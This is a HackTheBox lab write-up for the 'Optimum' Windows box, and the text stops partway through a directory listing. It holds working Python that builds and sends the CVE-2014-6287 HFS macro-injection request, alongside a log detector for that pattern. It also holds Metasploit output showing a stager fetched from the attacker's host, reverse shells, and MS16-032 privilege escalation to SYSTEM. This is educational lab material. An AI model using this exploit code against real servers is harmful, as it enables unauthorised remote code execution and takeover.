
【HackTheBox】Optimum - Writeup

Posted at 2024-01-01

Preface

This article is a writeup for Optimum 📝
We are going after the double-peace-sign guy.
[image: Optimum.png]

Machine Info

Name: Optimum
IP Address: 10.10.10.8
OS: Windows 🪟

Recon

Port Scan - Nmap

┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# nmap 10.10.10.8 -Pn -v -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-02 00:23 JST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 00:23
Completed NSE at 00:23, 0.00s elapsed
Initiating NSE at 00:23
Completed NSE at 00:23, 0.00s elapsed
Initiating NSE at 00:23
Completed NSE at 00:23, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 00:23
Completed Parallel DNS resolution of 1 host. at 00:23, 0.08s elapsed
Initiating SYN Stealth Scan at 00:23
Scanning 10.10.10.8 [1000 ports]
Discovered open port 80/tcp on 10.10.10.8
Completed SYN Stealth Scan at 00:23, 23.47s elapsed (1000 total ports)
Initiating Service scan at 00:23
Scanning 1 service on 10.10.10.8
Completed Service scan at 00:24, 6.76s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 10.10.10.8
Retrying OS detection (try #2) against 10.10.10.8
Initiating Traceroute at 00:24
Completed Traceroute at 00:24, 0.61s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 00:24
Completed Parallel DNS resolution of 2 hosts. at 00:24, 0.03s elapsed
NSE: Script scanning 10.10.10.8.
Initiating NSE at 00:24
Completed NSE at 00:24, 7.16s elapsed
Initiating NSE at 00:24
Completed NSE at 00:24, 1.38s elapsed
Initiating NSE at 00:24
Completed NSE at 00:24, 0.00s elapsed
Nmap scan report for 10.10.10.8
Host is up (0.44s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-title: HFS /
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
|_http-server-header: HFS 2.3
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 2012|8|Phone|7 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows Server 2012 (89%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (89%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Embedded Standard 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.273 days (since Mon Jan  1 17:50:41 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   597.19 ms 10.10.14.1
2   597.21 ms 10.10.10.8

NSE: Script Post-scanning.
Initiating NSE at 00:24
Completed NSE at 00:24, 0.00s elapsed
Initiating NSE at 00:24
Completed NSE at 00:24, 0.00s elapsed
Initiating NSE at 00:24
Completed NSE at 00:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.66 seconds
           Raw packets sent: 2094 (95.844KB) | Rcvd: 56 (3.272KB)

Only port 80 is open, and the service scan already names the software: HttpFileServer httpd 2.3 (Server header "HFS 2.3"). The OS fingerprint points at Windows Server 2012 / 8.1, which the "Version 6.3.9600" banner in the shell later confirms.

Site - http://10.10.10.8

Browsing to it, this is the page you get.
[image: スクリーンショット 2024-01-01 17.56.16.png]

Clicking Login prompts for credentials.
[image: スクリーンショット 2024-01-02 0.29.19.png]

I tried Home and the other buttons as well, but there seems to be nothing of interest for now.

Enumeration

Let's make sure nothing was missed.

dirsearch

┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# dirsearch -u http://10.10.10.8
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Desktop/work/reports/http_10.10.10.8/_24-01-02_00-34-22.txt

Target: http://10.10.10.8/

[00:34:22] Starting: 
[00:37:10] 200 -  576B  - /favicon.ico

Task Completed

No directories worth looking at turned up.

I also fired up Burp and poked at the Login form, but it yielded nothing useful so far, so let's take a different approach.

The Server Information section shows that HttpFileServer 2.3 is in use. Let's look into that in detail.

Identification of Vulnerability

CVE-2014-6287

Searching for "Http File Server 2.3 vuln" turns up a Remote Command Execution vulnerability, CVE-2014-6287, which covers HFS 2.3x releases before 2.3c. Let's exploit it.
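How the RCE actually works, as an added example (this is not code from the writeup, nor from the GitHub script or the Metasploit module used below): HFS 2.3x renders its pages through its own template engine, whose macros include `{.exec|<command>.}`. The value of the `?search=` parameter is supposed to be scrubbed of macro markers before it reaches that engine, but the scrub treats the string as NUL-terminated and never sees past `%00`, while the engine processes the whole string. The block below builds that request, offers a blind sender for a lab target, and flags the same pattern in an access log. The function names, the host/port arguments and the sample log lines are mine (the log is constructed in common log format, which is not what HFS's native log looks like).

```python
"""Added example (not from the writeup, the GitHub script or the Metasploit
module): the request behind CVE-2014-6287, a banner check, and a log detector.
"""
import http.client
import re
from urllib.parse import quote, unquote


def is_vulnerable_hfs(server_header: str) -> bool:
    """Match the banner nmap showed above. The CVE covers 2.3x before 2.3c."""
    return re.fullmatch(r"HFS 2\.3[ab]?", server_header.strip()) is not None


def build_request_path(command: str) -> str:
    """Path + query that makes the server run `command` through the exec macro."""
    macro = "{.exec|" + command + ".}"
    # The leading %00 is what defeats the marker check; the rest is ordinary
    # URL-encoding so the macro survives the trip through the query string.
    return "/?search=%00" + quote(macro, safe="")


def send_command(host: str, port: int, command: str, timeout: float = 10) -> int:
    """Fire one request at a lab target and return the HTTP status.

    exec is blind: HFS does not return the command's output, which is why the
    public exploits use it to launch a reverse shell rather than to read results.
    """
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", build_request_path(command))
        return conn.getresponse().status
    finally:
        conn.close()


# --- defender side: spot the same pattern in an access log ------------------

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def is_macro_injection(request_path: str) -> bool:
    """True when a (possibly URL-encoded) path smuggles an HFS macro."""
    decoded = unquote(request_path)          # %00 becomes a real NUL byte here
    return "\x00{." in decoded or "{.exec|" in decoded or "{.save|" in decoded


def find_injection_attempts(log_lines):
    """Return the log lines whose request path looks like CVE-2014-6287 abuse."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if m and is_macro_injection(m.group(1)):
            hits.append(line)
    return hits


# Constructed sample (common log format, not HFS's own log). The second line is
# exactly what build_request_path("cmd.exe /c whoami") produces.
SAMPLE_LOG = [
    '10.10.14.4 - - [01/Jan/2024:23:21:40 +0900] "GET / HTTP/1.1" 200 1967',
    '10.10.14.4 - - [01/Jan/2024:23:21:44 +0900] "GET /?search=%00%7B.exec%7Ccmd.exe%20%2Fc%20whoami.%7D HTTP/1.1" 200 0',
    '10.10.14.4 - - [01/Jan/2024:23:22:01 +0900] "GET /?search=report.pdf HTTP/1.1" 200 1213',
]

if __name__ == "__main__":
    print(build_request_path("cmd.exe /c whoami"))
    for hit in find_injection_attempts(SAMPLE_LOG):
        print("suspicious:", hit)
```

Because `exec` returns nothing to the client, both the GitHub script and the Metasploit module below use it only to make the target fetch and run a stager that calls back to the attacker; the request itself looks the same either way, which is what makes it an easy thing to alert on.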

Exploit the Vulnerability

github

I found a promising-looking script. Let's give it a try.

┌──(root㉿kali)-[/home/kali/Desktop/work/Rejetto-HTTP-File-Server-HFS-2.3.x---Remote-Command-Execution]
└─# python3 hfs-2-3-exploit.py                 
Local Host IP       : 10.10.14.4
Listen Port         : 4444
Remote Host IP      : 10.10.10.8
HTTP FileServer Port: 80

[+] Checking URL Is HTTP FileServer 2.3...
[+] Target is online and appears to be HttpFileServer 2.3
[+} Building Exploit
[+] Do you want me to start a Netcat Listener for you? (Y/n): Y
[+] Sending Exploit
[+] Starting Netcat on Port: 4444


!!!! --- Press Enter After Connection Established --- !!!!


listening on [any] 4444 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.8] 49169
^C

I waited a while, but it didn't work out, so I gave up on this one.

metasploit

┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# msfconsole     
Metasploit tip: You can pivot connections over sessions started with the 
ssh_login modules
                                                  

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        https://metasploit.com


       =[ metasploit v6.3.43-dev                          ]
+ -- --=[ 2376 exploits - 1232 auxiliary - 416 post       ]
+ -- --=[ 1388 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > search CVE-2014-6287

Matching Modules
================

   #  Name                                   Disclosure Date  Rank       Check  Description
   -  ----                                   ---------------  ----       -----  -----------
   0  exploit/windows/http/rejetto_hfs_exec  2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution

Exactly one exploit module matched. Let's use it.

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

Check the settings with show options and set what is needed.

msf6 exploit(windows/http/rejetto_hfs_exec) > show options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to liste
                                         n on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.236.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

LHOST and RHOSTS are what need setting. (Typing set RHOST works because Metasploit treats RHOST as an alias for RHOSTS, as the second show options confirms.)


msf6 exploit(windows/http/rejetto_hfs_exec) > set LHOST 10.10.14.4
LHOST => 10.10.14.4
msf6 exploit(windows/http/rejetto_hfs_exec) > set RHOST 10.10.10.8
RHOST => 10.10.10.8
msf6 exploit(windows/http/rejetto_hfs_exec) > show options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.10.8       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to liste
                                         n on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.4       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

All set. Let's run it.

msf6 exploit(windows/http/rejetto_hfs_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.4:4444 
[*] Using URL: http://10.10.14.4:8080/px8cI3cT
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /px8cI3cT
[*] Sending stage (175686 bytes) to 10.10.10.8
[!] Tried to delete %TEMP%\LKpMxyyxCUCw.vbs, unknown result
[*] Meterpreter session 1 opened (10.10.14.4:4444 -> 10.10.10.8:49162) at 2024-01-01 23:21:44 +0900
[*] Server stopped.

meterpreter > 

We got a shell. Note the warning about %TEMP%\LKpMxyyxCUCw.vbs: the module drops a VBScript stager on the target and then tries to delete it, so this exploit is not artifact-free.

meterpreter > shell
Process 1896 created.
Channel 2 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>whoami
whoami
optimum\kostas

Analysis & Recon

Let's look around. user.txt is right there. (The AM/PM markers in dir's output come out as replacement characters because the host uses a non-US locale; the "." thousands separators in the byte counts are another sign of it.) The directory literally named %TEMP% next to hfs.exe lines up with the module's warning above: the stager was written under a literal "%TEMP%" path relative to HFS's working directory rather than the user's temp folder.

C:\Users\kostas\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is EE82-226D

 Directory of C:\Users\kostas\Desktop

08/01/2024  01:19     <DIR>          .
08/01/2024  01:19     <DIR>          ..
08/01/2024  01:19     <DIR>          %TEMP%
18/03/2017  02:11            760.320 hfs.exe
07/01/2024  07:49                 34 user.txt
               2 File(s)        760.354 bytes
               3 Dir(s)   5.673.996.288 bytes free

C:\Users\kostas\Desktop>cat user.txt
cat user.txt
'cat' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\kostas\Desktop>type user.txt
type user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //32文字のUserFlag

I reached for cat out of habit, but remember this is a Windows box: use type instead.

Privilege Escalation

To read root.txt we need to escalate privileges.
Background the session and run Multi Recon Local Exploit Suggester to look for candidates.

meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(windows/http/rejetto_hfs_exec) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester

msf6 exploit(windows/http/rejetto_hfs_exec) > use 0

Check the settings with show options.

msf6 post(multi/recon/local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits


View the full module info with the info, or info -d command.

Set SESSION.

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 2
SESSION => 2
msf6 post(multi/recon/local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION          2                yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits


View the full module info with the info, or info -d command.

All set. Let's run it.

msf6 post(multi/recon/local_exploit_suggester) > exploit

[*] 10.10.10.8 - Collecting local exploits for x86/windows...
[*] 10.10.10.8 - 188 exploit checks are being tried...
[+] 10.10.10.8 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.8 - exploit/windows/local/bypassuac_sluihijack: The target appears to be vulnerable.
[+] 10.10.10.8 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!
[+] 10.10.10.8 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.8 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 10.10.10.8 - Valid modules for session 2:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/bypassuac_sluihijack                     Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   Yes                      The service is running, but could not be validated. Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!
 4   exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.
 5   exploit/windows/local/tokenmagic                               Yes                      The target appears to be vulnerable.
 6   exploit/windows/local/adobe_sandbox_adobecollabsync            No                       Cannot reliably check exploitability.
 7   exploit/windows/local/agnitum_outpost_acs                      No                       The target is not exploitable.
 8   exploit/windows/local/always_install_elevated                  No                       The target is not exploitable.
 9   exploit/windows/local/anyconnect_lpe                           No                       The target is not exploitable. vpndownloader.exe not found on file system
 10  exploit/windows/local/bits_ntlm_token_impersonation            No                       The target is not exploitable.
 11  exploit/windows/local/bthpan                                   No                       The target is not exploitable.
 12  exploit/windows/local/bypassuac_fodhelper                      No                       The target is not exploitable.
 13  exploit/windows/local/canon_driver_privesc                     No                       The target is not exploitable. No Canon TR150 driver directory found
 14  exploit/windows/local/cve_2020_1048_printerdemon               No                       The target is not exploitable.
 15  exploit/windows/local/cve_2020_1337_printerdemon               No                       The target is not exploitable.
 16  exploit/windows/local/gog_galaxyclientservice_privesc          No                       The target is not exploitable. Galaxy Client Service not found
 17  exploit/windows/local/ikeext_service                           No                       The check raised an exception.
 18  exploit/windows/local/ipass_launch_app                         No                       The check raised an exception.
 19  exploit/windows/local/lenovo_systemupdate                      No                       The check raised an exception.
 20  exploit/windows/local/lexmark_driver_privesc                   No                       The check raised an exception.
 21  exploit/windows/local/mqac_write                               No                       The target is not exploitable.
 22  exploit/windows/local/ms10_015_kitrap0d                        No                       The target is not exploitable.
 23  exploit/windows/local/ms10_092_schelevator                     No                       The target is not exploitable. Windows 2012 R2 (6.3 Build 9600). is not vulnerable
 24  exploit/windows/local/ms13_053_schlamperei                     No                       The target is not exploitable.
 25  exploit/windows/local/ms13_081_track_popup_menu                No                       Cannot reliably check exploitability.
 26  exploit/windows/local/ms14_058_track_popup_menu                No                       The target is not exploitable.
 27  exploit/windows/local/ms14_070_tcpip_ioctl                     No                       The target is not exploitable.
 28  exploit/windows/local/ms15_004_tswbproxy                       No                       The target is not exploitable.
 29  exploit/windows/local/ms15_051_client_copy_image               No                       The target is not exploitable.
 30  exploit/windows/local/ms16_016_webdav                          No                       The target is not exploitable.
 31  exploit/windows/local/ms16_075_reflection                      No                       The target is not exploitable.
 32  exploit/windows/local/ms16_075_reflection_juicy                No                       The target is not exploitable.
 33  exploit/windows/local/ms_ndproxy                               No                       The target is not exploitable.
 34  exploit/windows/local/novell_client_nicm                       No                       The target is not exploitable.
 35  exploit/windows/local/ntapphelpcachecontrol                    No                       The check raised an exception.
 36  exploit/windows/local/ntusermndragover                         No                       The target is not exploitable.
 37  exploit/windows/local/panda_psevents                           No                       The target is not exploitable.
 38  exploit/windows/local/ppr_flatten_rec                          No                       The target is not exploitable.
 39  exploit/windows/local/ricoh_driver_privesc                     No                       The target is not exploitable. No Ricoh driver directory found
 40  exploit/windows/local/virtual_box_guest_additions              No                       The target is not exploitable.
 41  exploit/windows/local/webexec                                  No                       The check raised an exception.

[*] Post module execution completed

The top five are the candidates the checks flagged. Trying them one at a time, the fourth one (ms16_032) is what worked. Two things to keep in mind when reading this table: the suggester only ran checks for modules matching the session's architecture ("Collecting local exploits for x86/windows"), because the meterpreter payload is 32-bit even though the host turns out to be 64-bit; and the two bypassuac modules are a different class of exploit, since a UAC bypass only elevates a user who is already a local administrator, whereas MS16-032 is a genuine privilege-escalation bug.
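A small triage helper for the suggester table above, as an added example (not from the writeup or from Metasploit): it parses the module rows and orders the "Yes" candidates by how much the check actually proved, pushing UAC bypasses to the back. The sample rows are copied from the output above (trimmed); the function names and the scoring rule are mine.

```python
"""Added example: triage the local_exploit_suggester table.

Ranking rule (my own, not Metasploit's): a check that claims the target is
vulnerable beats one that could not validate; UAC bypasses go last because
they only help if the current user is already a local administrator.
"""
import re

ROW_RE = re.compile(r"^\s*\d+\s+(exploit/\S+)\s+(Yes|No)\s+(.+?)\s*$")

# Rows copied from the suggester output in this writeup, trimmed to a few lines.
SAMPLE_OUTPUT = """
 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/bypassuac_sluihijack                     Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   Yes                      The service is running, but could not be validated. Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!
 4   exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.
 5   exploit/windows/local/tokenmagic                               Yes                      The target appears to be vulnerable.
 6   exploit/windows/local/adobe_sandbox_adobecollabsync            No                       Cannot reliably check exploitability.
 7   exploit/windows/local/agnitum_outpost_acs                      No                       The target is not exploitable.
"""


def parse_suggester(text):
    """Turn the table into dicts: module path, whether it was flagged, check text."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            module, flag, reason = m.groups()
            rows.append({"module": module, "candidate": flag == "Yes", "reason": reason})
    return rows


def triage_score(row):
    """Lower is better: 0 = check says vulnerable, +1 = could not be validated,
    +2 = UAC bypass (needs an admin user to begin with)."""
    score = 0
    if "could not be validated" in row["reason"]:
        score += 1
    if "/bypassuac_" in row["module"]:
        score += 2
    return score


def ranked_candidates(text):
    """Module paths flagged 'Yes', best-first; ties keep the suggester's order."""
    rows = [r for r in parse_suggester(text) if r["candidate"]]
    return [r["module"] for r in sorted(rows, key=triage_score)]


if __name__ == "__main__":
    for i, module in enumerate(ranked_candidates(SAMPLE_OUTPUT), 1):
        print(i, module)
```

The ranking is only a starting order, not a prediction: on this box the check for tokenmagic reads "appears to be vulnerable" while the module that actually delivered a shell was MS16-032, whose check only says "could not be validated". Check results are heuristics about the OS build and running services, so each candidate still has to be run.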

Configure it the same way as before.

msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > show options

Module options (exploit/windows/local/ms16_032_secondary_logon_handle_privesc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.236.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set lhost 10.10.14.4
lhost => 10.10.14.4
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set session 2
session => 2
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > show options

Module options (exploit/windows/local/ms16_032_secondary_logon_handle_privesc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  2                yes       The session to run this module on


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.4       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86



View the full module info with the info, or info -d command.

Run it.

msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run

[*] Started reverse TCP handler on 10.10.14.4:4444 
[+] Compressed size: 1160
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\BcgFSuoEtx.ps1...
[*] Compressing script contents...
[+] Compressed size: 3743
[*] Executing exploit script...
	 __ __ ___ ___   ___     ___ ___ ___ 
	|  V  |  _|_  | |  _|___|   |_  |_  |
	|     |_  |_| |_| . |___| | |_  |  _|
	|_|_|_|___|_____|___|   |___|___|___|
	                                    
	               [by b33f -> @FuzzySec]

[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 1220

[*] Sniffing out privileged impersonation token..

[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[ref] cannot be applied to a variable that does not exist.
At line:200 char:3
+         $qAz = [Ntdll]::NtImpersonateThread($wM6, $wM6, [ref]$b_AQ)
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (b_AQ:VariablePath) [], Runtim 
   eException
    + FullyQualifiedErrorId : NonExistingVariableReference
 
[!] NtImpersonateThread failed, exiting..
[+] Thread resumed!

[*] Sniffing out SYSTEM shell..

[>] Duplicating SYSTEM token
Cannot convert argument "ExistingTokenHandle", with value: "", for "DuplicateTo
ken" to type "System.IntPtr": "Cannot convert null to type "System.IntPtr"."
At line:259 char:2
+     $qAz = [Advapi32]::DuplicateToken($rJG, 2, [ref]$ftoaU)
+     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodException
    + FullyQualifiedErrorId : MethodArgumentConversionInvalidCastArgument
 
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!

KHPgiZYP84alGvOsQ1GzdNieqyEW7ItF
[+] Executed on target machine.
[*] Sending stage (175686 bytes) to 10.10.10.8
[*] Meterpreter session 3 opened (10.10.14.4:4444 -> 10.10.10.8:49168) at 2024-01-02 00:03:47 +0900
[+] Deleted C:\Users\kostas\AppData\Local\Temp\BcgFSuoEtx.ps1

meterpreter > 

Privilege escalation worked. Don't be put off by the PowerShell errors in the middle of the output: the script's first approach (NtImpersonateThread / DuplicateToken on the leaked handle) failed, but its fallback token race succeeded, which is what the "Holy handle leak Batman" line reports, and a new session 3 opened. The shell it drops into is still in C:\Users\kostas\Desktop, so a whoami would be the proper confirmation; reading root.txt out of the Administrator profile below proves the point anyway.

meterpreter > shell
Process 336 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>cd /
cd /

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is EE82-226D

 Directory of C:\

22/08/2013  05:52     <DIR>          PerfLogs
31/12/2017  06:14     <DIR>          Program Files
22/08/2013  05:39     <DIR>          Program Files (x86)
18/03/2017  01:57     <DIR>          Users
18/03/2017  01:53     <DIR>          Windows
               0 File(s)              0 bytes
               5 Dir(s)   5.686.956.032 bytes free

C:\>cd Users
cd Users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is EE82-226D

 Directory of C:\Users

18/03/2017  01:57     <DIR>          .
18/03/2017  01:57     <DIR>          ..
18/03/2017  01:52     <DIR>          Administrator
18/03/2017  01:57     <DIR>          kostas
22/08/2013  05:39     <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)   5.686.956.032 bytes free

There is an Administrator directory. Let's go in.

C:\Users>cd Administrator
cd Administrator

C:\Users\Administrator>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is EE82-226D

 Directory of C:\Users\Administrator

18/03/2017  01:52     <DIR>          .
18/03/2017  01:52     <DIR>          ..
18/03/2017  01:52     <DIR>          Contacts
18/03/2017  02:14     <DIR>          Desktop
18/03/2017  01:52     <DIR>          Documents
18/03/2017  01:52     <DIR>          Downloads
18/03/2017  01:52     <DIR>          Favorites
18/03/2017  01:52     <DIR>          Links
18/03/2017  01:52     <DIR>          Music
